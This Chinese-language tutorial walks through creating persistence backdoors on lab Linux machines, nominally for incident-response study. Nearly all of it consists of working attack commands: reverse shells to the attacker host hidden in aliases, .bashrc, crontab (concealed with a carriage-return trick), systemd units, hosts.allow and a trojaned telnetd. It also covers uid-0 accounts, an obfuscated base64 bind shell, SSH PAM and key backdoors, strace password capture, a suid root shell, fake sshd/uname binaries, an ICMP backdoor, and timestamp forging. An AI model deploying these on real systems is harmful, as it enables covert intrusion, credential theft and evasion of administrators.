操作目的和应用场景

最近正在研究与Linux系统应急响应相关的技术，想通过这篇文章简述一下Linux系统后门的创建方法。网上关于Linux后门创建的文章很多，本文也有所借鉴，并会通过详细的步骤对后门的创建和利用方法进行描述。

在本文介绍的例子中，被攻击者一般都是虚拟机中的CentOS或ubuntu系统，攻击一般从宿主机的manjaro系统发起。

平台及工具版本：

host系统：manjaro linux（192.168.242.1）

虚拟机管理程序：vmware workstation 16

虚拟机：CentOS 7（192.168.242.133）、ubuntu（192.168.242.143）、CentOS 6.5（192.168.242.132）

一、Linux系统创建uid为0的后门账户

（一）CentOS 7系统命令行创建uid为0的用户

1、 直接创建

useradd -o -u 0 backdoor && echo "Eu2xa2fu@#" | passwd backdoor --stdin

经验证可以正常登录。

//通过交互式方式创建用户并设置口令

useradd -o -u 0 test1

passwd test1

2、 将命令与PROMPT_COMMAND结合

（1）写入/root/.bashrc文件

vi /root/.bashrc  //编辑root用户的配置文件，加入下面的内容

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

保存退出

source /root/.bashrc  //执行文件中的指令，账户被创建。

以后每次切换到root时都会执行/root/.bashrc中的指令，从而创建账户。

（2）验证

cat /etc/passwd | grep hack

后门账户创建成功。

（二）Ubuntu系统

useradd -p 0`openssl passwd -1 -salt 'abc' pass1234` -u 0  -o -g root -G root -s /bin/bash hack

创建成功。

二、CentOS 7系统创建alias后门

（一）创建Linux系统命令如ls的别名

1、 受控端创建别名

//使用ruby实现反弹连接（使用netcat接收）。ruby的反弹连接建立后会转入后台，不暴露任何痕迹，非常隐蔽，推荐使用。注意内部的双引号都是"'"'"。

alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"

//使用ruby实现反弹连接（使用msfconsole接收），注意双引号的嵌套。

alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end';};alerts"

2、 攻击者监听本地端口

nc -l -p 5555

3、 受控端管理员执行ls命令（ruby，使用netcat接收）

4、 攻击者获得反弹shell

（二）创建alias和unalias的别名

由于alias命令可以查看当前的别名，会让ls的反弹指令暴露。因此需要劫持alias命令，让它的输出中不显示反弹的指令。另外unalias命令会清除别名，因此也要对其进行劫持，避免ls的别名被清除。

1、 创建unalias的别名

//若先创建alias的别名，那么alias就失去了原来alias的功能，则unalias的别名就无法创建了

alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'

不会清除ls别名。

2、 创建alias的别名

vi /tmp/.alias.txt  //加入下面的内容

alias egrep='egrep --color=auto'

alias fgrep='fgrep --color=auto'

alias grep='grep --color=auto'

alias l.='ls -d .* --color=auto'

alias ll='ls -l --color=auto'

alias ls='ls --color=auto'

alias vi='vim'

alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'

保存退出

alias alias="cat /tmp/.alias.txt"

（三）将alias加入隐蔽的位置

1、 在正常的位置创建合理的文件

vi /etc/yum/yum-update.rc  //创建文件，加入别名设置

alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"

alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'

alias alias="cat /tmp/.alias.txt"

保存退出

2、 将正常文件的时间复制给包含alias的文件

touch -acmr version-groups.conf yum-update.rc

3、 利用alias别名实现连接

被攻击者操作：

攻击者获得反弹shell：

三、CentOS 7系统创建bashrc后门

（一）攻击者将恶意指令写入~/.bashrc文件

su  //切换到root

echo 'bash -i >& /dev/tcp/192.168.242.1/5555 0>&1' > ~/.bashrc

（二）攻击者监听本地端口

nc -l -p 5555

（三）管理员登录被攻击服务器

su  //管理员先以普通用户身份登录，之后切换到root

（四）攻击者得到反弹连接

nc -l -p 5555

得到shell，说明.bashrc文件中的反弹指令被执行。

四、CentOS 7系统创建crontab后门

（一）添加计划任务

方法1、使用crontab命令创建计划任务，并使用nc接收连接

1、添加非隐藏的计划任务

crontab -l | { cat; echo "*/1 * * * * bash -i >& /dev/tcp/192.168.242.1/5555 0>&1"; } | crontab -

//每分钟执行一次反弹连接

计划任务添加成功。

nc -l -p 5555  //攻击者监听本地端口

得到shell，说明计划任务被执行。

2、以隐藏的方式加入计划任务

(crontab -l;printf "*/1 * * * * bash -i >& /dev/tcp/192.168.242.1/5555 0>&1;\rno crontab for `whoami`%100c\n")|crontab -

管理员使用crontab -l看不到添加的的计划任务。

解释：

crontab将用户的计划任务保存到“/var/spool/cron/用户名”文件中。crontab -l实际上是使用cat命令查看这个文件：

但使用vim命令查看，这个文件的内容是：

使用cat命令的-A选项也可以看到文件的真正内容：

cat -A /var/spool/cron/root

攻击者得到反弹连接：

方法2、直接写入/etc/crontab文件，并使用msfconsole接收连接

sh -c "echo '* * * * * root cd /tmp && mknod backpipe p && nc 192.168.242.1 5555 0<backpipe | /bin/bash 1>backpipe' >> /etc/crontab"

攻击者接收反弹连接

msfconsole

use exploit/multi/handler

set payload cmd/unix/reverse_bash

set lhost 192.168.242.1

set lport 5555

exploit

一分钟之后即可获得连接：

五、CentOS 7系统通过PROMPT_COMMAND环境变量创建后门

（一）创建后门，监听1025端口

vi ~user1/.bashrc  //修改配置文件，加入下面的内容

export PROMPT_COMMAND="lsof -i:1025 &>/dev/null || (python -c \"exec('aW1wb3J0IHNvY2tldCxvcyxzeXMKcz1zb2NrZXQuc29ja2V0KCkKcy5iaW5kKCgiIiwxMDI1KSkKcy5saXN0ZW4oMSkKKGMsYSk9cy5hY2NlcHQoKQp3aGlsZSAxOgogZD1jLnJlY3YoNTEyKQogaWYgJ2V4aXQnIGluIGQ6CiAgcy5jbG9zZSgpCiAgc3lzLmV4aXQoMCkKIHI9b3MucG9wZW4oZCkucmVhZCgpCiBjLnNlbmQocikK'.decode('base64'))\" 2>/dev/null &)"

保存退出

source ~/.bashrc  //使配置立即生效

netstat -an | grep :1025  //查看1025端口的监听情况。

每次user1用户登录都会自动执行其.bashrc文件中的指令，也就是说，开始监听1025端口。

（二）攻击者远程连接

nc 192.168.242.133 1025

连接成功，得到shell。

六、CentOS 7系统创建ssh服务后门

原理：Linux软链接ssh后门需要ssh支持PAM认证。将sshd软链接名称设置为su，这样在命令启动后会到PAM配置中查找是否存在对应su的配置信息。

（一）创建ssh后门

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

开始监听31337端口。

也可以使用下面的命令监听端口：

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oPort=12345

ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=12345

（二）远程连接到ssh后门

ssh -p 31337 root@192.168.242.133

使用root/bin/ftp/mail当用户名，密码随意，就可登陆。

七、manjaro 20系统创建ssh客户端后门

（一）创建ssh命令的alias

被攻击者：manjaro 20系统，编辑用户的.bashrc配置文件。

vi ~/.bashrc  //文件末尾加入下面的指令

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

保存退出

source ~/.bashrc

（二）获取ssh账户口令

1、 manjaro系统中的用户发起ssh连接

ssh user1@192.168.242.133  //正常用户执行ssh连接，在/tmp目录生成记录

2、 获取ssh账户/口令

cat /tmp/sshpwd-2411月111606192953.log  | grep -n password | grep write  //查找指定信息所在的行，这里是第89行

less /tmp/sshpwd-2411月111606192953.log

输入89g，跳到第89行

密码就在这里：123456

八、CentOS 7系统创建ssh证书后门

（一）攻击者生成非对称密钥对

ssh-keygen -t rsa  //生成公私密钥对，输入密钥短语

（二）CentOS 7服务器配置允许公钥登录

vi /etc/ssh/sshd_config  //编辑配置文件，设置如下信息

PermitRootLogin yes

StrictModes no

PubkeyAuthentication yes

AuthorizedKeysFile %h/.ssh/authorized_keys

RSAAuthentication yes

保存退出

注意：

（1）RSAAuthentication yes这一行需要手写到配置文件中最后一行。

（2）AuthorizedKeysFile参数中，%h代表用的主目录，%h/后面有个点，没有点将会出现“Permission Denied (publickey)”的错误提示，无法连接。

（3）注意取消行首的注释符。

systemctl restart sshd  //重新启动ssh服务

配置生效。

（三）攻击者上传证书

scp ~/.ssh/id_rsa.pub root@192.168.242.133:~  //攻击者将本地用户的公钥上传到服务器

上传成功。注意传到用户的主目录即可，不要复制到~/.ssh/id_rsa.pub，这样会覆盖目标主机自己的公钥文件。注意id_rsa.pub文件不是隐藏的。

也可以使用 ssh-copy-id 将自己的公钥复制到目标系统

ssh-copy-id -i ~/.ssh/id_rsa.pub root@192.168.242.133

（四）CentOS 7服务器将攻击者公钥加入authorized_keys

cat /root/id_rsa.pub >> ~/.ssh/authorized_keys

systemctl restart sshd  //重启ssh服务

（五）攻击者通过证书登录服务器

ssh -i /root/.ssh/id_rsa root@192.168.242.133

//由于公钥上传到了服务器root账户的home目录，所以这里要指定root用户。如果不指定，则默认使用攻击者当前的用户—user1，而前面未向服务器的user1用户的home目录上传公钥，这样要登录还得要账户口令验证。

九、CentOS 7系统创建suid后门

（一）创建suid后门文件

1、 创建源代码文件

sudo echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c

2、 编译

sudo gcc -o privshell privshell.c  //编译为可执行文件，名为privshell

3、 给予执行权限并设置suid标志位

sudo chown root:root privshell && sudo chmod u+s privshell

（二）普通用户执行suid后门获取root权限

./privshell

十、CentOS 7系统创建systemd服务后门

（一）创建后门

1、 创建服务描述文件

cd /usr/lib/systemd/system

touch backdoor.service

vi backdoor.service  //编辑文件，加入下面的内容

[Unit]

Description=Very important backdoor.

After=network.target

[Service]

Type=forking

ExecStart=nc -e /bin/bash 192.168.242.1 5555 >/dev/null 2>&1

ExecReload=

ExecStop=

PrivateTmp=true

[Install]

WantedBy=multi-user.target

保存退出

2、 给予执行权限

chmod +x /usr/lib/systemd/system/backdoor.service

3、 使服务生效

systemctl daemon-reload  //重新读取服务信息

（二）攻击者监听本地端口

nc -l -p 5555

（三）被控端启动后门

systemctl enable backdoor

systemctl start backdoor

（四）攻击者获得shell

十一、CentOS 7系统创建tcp wrapper后门

TCP_Wrappers是一个工作在应用层的安全工具，它对某些具体应用或者服务可以起到一定的防护作用。比如说针对ssh、telnet、FTP等服务的请求，都会先受到TCP_Wrappers的拦截。

TCP_Wrappers有一个TCP的守护进程叫作tcpd。以telnet为例，每当有telnet的连接请求时，tcpd即会截获请求，先读取系统管理员所设置的访问控制文件，合乎要求，则会把这次连接原封不动的转给真正的telnet进程，由telnet完成后续工作；如果这次连接发起的ip不符合访问控制文件中的设置，则会中断连接请求。

（一）被攻击服务器操作

1、 创建tcp wrapper后门

vi /etc/hosts.allow  //编辑配置文件，加入下面的内容

ALL: ALL: spawn (bash -c "/bin/bash -i >& /dev/tcp/192.168.242.1/443 0>&1") & :allow

保存退出。

上面指令的含义是，允许所有的连接，并且当连接出现时，启动bash进行反弹连接。

（二）攻击者本地操作

1、 监听本地端口

sudo nc -l -p 443

2、 连接目标服务器

ssh 192.168.242.133  //连接目标服务器的22端口

无需输入口令

3、 接收反弹连接

成功获取反弹shell，权限为root。

十二、ubuntu 1604系统创建rhosts++后门

（一）部署rsh服务

1、 安装rsh和xinetd

apt-get install rsh-client rsh-server xinetd

2、 配置xinetd

touch /etc/xinetd.d/rsh  && vi /etc/xinetd.d/rsh  //加入下面的内容

# default: on

# descrīption: The rshd server is the server for the rcmd(3) routine and, \

# consequently, for the rsh(1) program.  The server provides \

# remote execution facilities with authentication based on \

# privileged port numbers from trusted hosts.

service shell

{

disable = no

socket_type             = stream

wait                    = no

user                    = root

log_on_success          += USERID

log_on_failure          += USERID

server                  = /usr/sbin/in.rshd

}

/etc/xinetd.d/rlogin

# default: on

# descrīption: rlogind is the server for the rlogin(1) program.  The server \

# provides a remote login facility with authentication based on \

# privileged port numbers from trusted hosts.

service login

{

disable = no

socket_type             = stream

wait                    = no

user                    = root

log_on_success          += USERID

log_on_failure          += USERID

server                  = /usr/sbin/in.rlogind

}

/etc/xinetd.d/rexec

# default: off

# descrīption: Rexecd is the server for the rexec(3) routine.  The server \

# provides remote execution facilities with authentication based \

# on user names and passwords.

service exec

{

disable = no

socket_type             = stream

wait                    = no

user                    = root

log_on_success          += USERID

log_on_failure          += USERID

server                  = /usr/sbin/in.rexecd

}

保存退出

/etc/init.d/xinetd restart  //重启服务，rsh等服务随之启动

（二）创建rhosts++后门

1、 修改配置文件

vi /root/.rhosts  //编辑文件，加入下面的内容

+ +

保存退出

2、 攻击者远程访问ubuntu主机

rsh 192.168.242.143 date  //远程执行系统命令

执行成功

rsh 192.168.242.143 /bin/bash  //获取远程系统的shell

后门创建成功。

十三、ubuntu 1604系统创建xinetd后门

（一）安装xinetd服务和telnetd服务

1、 安装xinetd和telnetd软件

sudo apt-get install xinetd telnetd

dpkg -L xinetd | grep '/usr/sbin/\|/etc/'  //查看xinetd的可执行文件和配置文件

/usr/sbin/xinetd

/usr/sbin/itox

/usr/sbin/xconv.pl

/etc/init

/etc/init/xinetd.conf

/etc/xinetd.conf

/etc/init.d

/etc/init.d/xinetd

/etc/default

/etc/default/xinetd

/etc/xinetd.d

/etc/xinetd.d/daytime

/etc/xinetd.d/time

/etc/xinetd.d/discard

/etc/xinetd.d/echo

/etc/xinetd.d/chargen

dpkg -L telnetd | grep '/usr/sbin\|/etc/'  //查看telnetd的可执行文件和配置文件

/usr/sbin

/usr/sbin/in.telnetd

telnetd软件包只有可执行文件，没有配置文件。

2、 配置xinetd

vi /etc/xinetd.d/telnet  //默认不存在，创建并编辑，加入下面内容

# default: on

# description: The telnet server serves telnet sessions; it uses \

# unencrypted username/password pairs for authentication.

service telnet

{

disable = no

flags = REUSE

socket_type = stream

wait = no

user = root

server = /usr/sbin/in.telnetd

log_on_failure += USERID

}

保存退出。

/etc/init.d/xinetd restart  //重启xinetd服务

netstat -an | grep :23  //查看端口监听情况

3、 允许root远程登录

vi /etc/securetty  //加入下面内容

pts/0

pts/1

pts/2

pts/3

保存退出。

service xinetd restart  //重启服务

这样root就可以通过pts/0到pts/3这几个终端登录linux了。

（二）配置telnetd后门

1、 创建后门脚本

touch telnetd.sh && chmod +x telnetd.sh

vi telnetd.sh  //编辑文件，加入下面的内容

#!/bin/bash

socat udp-connect:192.168.242.1:5555 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

/usr/sbin/in.telnetd

保存退出。

2、 修改telnet服务配置文件

vi /etc/xinetd.d/telnet

server = /usr/sbin/in.telnetd

改为

server = /home/user1/telnetd.sh

保存退出。

/etc/init.d/xinetd restart  //重启xinetd服务

netstat -an | grep :23  //查看端口监听情况

3、 攻击者监听本地端口

nc -ul -p 5555

4、 攻击者访问目标主机的telnet端口

telnet 192.168.242.143

telnet服务命令被触发，执行服务配置文件中指定的脚本。

5、 攻击者得到反弹shell

十四、CentOS 7系统创建冒充ssh服务程序的shell脚本后门

（一）被控端创建假冒的sshd文件

mv /usr/sbin/sshd /usr/bin/  //将真正的sshd程序转移

touch /usr/sbin/sshd  //创建假冒的sshd脚本文件

vi /usr/sbin/sshd  //编辑文件，加入下面的内容

#!/usr/bin/perl

exec"/bin/bash"if(getpeername(STDIN)=~/^..LF/);

exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

保存退出

chmod +x /usr/sbin/sshd  //给予执行权限

systemctl restart sshd  //重启ssh服务，实际上执行了恶意脚本中的代码

（二）攻击者远程连接

socat STDIO TCP4:192.168.242.133:22,sourceport=19526

注意必须加上源端口参数。

十五、CentOS 7系统创建可以冒充系统命令的shell脚本后门

（一）攻击者在被控制的服务器上创建冒充uname程序的脚本

touch /usr/local/bin/uname  //创建后门脚本文件

vi /usr/local/bin/uname  //编辑文件，加入下面的内容

#!/bin/bash

nc -l -v -p 4444 -e /bin/bash 2>/dev/null &

socat TCP4-Listen:3177,fork EXEC:/bin/bash 2>/dev/null &

socat SCTP-Listen:1177,fork EXEC:/bin/bash 2>/dev/null &

perl -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' 2>/dev/null &

/bin/uname $@

保存退出。上面的四条监听端口的命令选择执行其中一条就可以。

（二）管理员运行被冒充的命令

uname -r

可以看到，执行是正常的。但是端口也暗中开始监听了：

（三）攻击者远程连接被控端

nc 192.168.242.133 4444

四个端口都可以连接。

十六、CentOS 6.5系统使用icmp后门prism

（一）下载prism包

https://github.com/andreafabrizi/prism/

（二）攻击者本地操作

1、 解压缩，编译prism.c，但不要执行

gcc -DDETACH -m32 -Wall -s -o prism prism.c

编译成功，生成了可执行文件。

2、 将prism可执行文件传送到受控端

scp prism user1@192.168.242.132:/home/user1/

3、 攻击者监听本地端口

nc -l -p 6666

（三）受控端的操作

1、 为了正常运行prism，需要安装下面的软件

yum install glibc.i686

2、 运行prism

./prism   //以root身份运行

运行后没有提示

（四）攻击者本地操作

1、 运行sendPacket.py，指定受控端IP地址、连接口令、控制端IP地址和监听端口

python2 sendPacket.py 192.168.242.132 p4ssw0rd 192.168.242.1 6666

连接口令默认为p4ssw0rd。

2、 监听程序接收到反弹连接

（五）检查通信流量

最初的sendPacket.py发出的是icmp包。抓包确认：

第一个包是ICMP request，包的内容中可以看到反弹地址和连接口令。

后面的包就都是TCP协议的数据包了。

控制端发出cat /etc/passwd命令，从受控端回传给控制端的数据包来看，能看出源、目的IP地址，源、目的端口。并且还能看到数据，是cat /etc/passwd命令的结果。

所以prism只是通过icmp进行连接的触发，后续的命令和都是通过TCP协议传输的。该软件适用于攻击者无法主动连接到服务器的TCP/UDP端口，但是可以ping通服务器的情况。prism在服务器上监听icmp请求，并验证连接口令。验证通过之后服务器主动连接到攻击者的VPS，攻击者得到反弹shell。由此可见prism是一个icmp后门。